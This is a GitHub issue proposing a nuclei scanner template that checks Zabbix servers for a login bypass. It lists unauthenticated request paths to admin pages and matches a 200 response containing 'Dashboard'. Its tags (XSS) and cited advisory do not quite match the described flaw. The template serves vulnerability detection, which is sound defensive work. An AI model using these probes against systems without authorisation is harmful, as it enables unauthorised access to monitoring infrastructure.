### ISSUE TITLE
[nuclei-template] Zabbix-Bypass-Login

### ISSUE THREAD

**Issue by vsh00t** [projectdiscovery/nuclei-templates#2194]
**Template Details**
An error in the security of the form allows the login page to be skipped directly to the administration panel, which allows an attacker to access the entire application, managing to make queries, edit parameters, among others.

```yaml
id: Zabbix-Bypass-Login

info:
  name: Zabbix-Bypass-Login
  author: vsh00t
  severity: medium
  description: An error in the security of the form allows the login page to be skipped directly to the administration panel, which allows an attacker to access the entire application, managing to make queries, edit parameters, among others.
  reference: https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt, PwnEC
  tags: zabbix,XSS

requests:
  - method: GET
    path:
      - "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list"
      - "{{BaseURL}}/zabbix/zabbix.php?action=problem.view&ddreset=1"
      - "{{BaseURL}}/zabbix/overview.php?ddreset=1"
      - "{{BaseURL}}/zabbix/hostinventoriesoverview.php?ddreset=1"
      - "{{BaseURL}}/zabbix/screenconf.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Dashboard"
      - type: status
        status:
          - 200

```
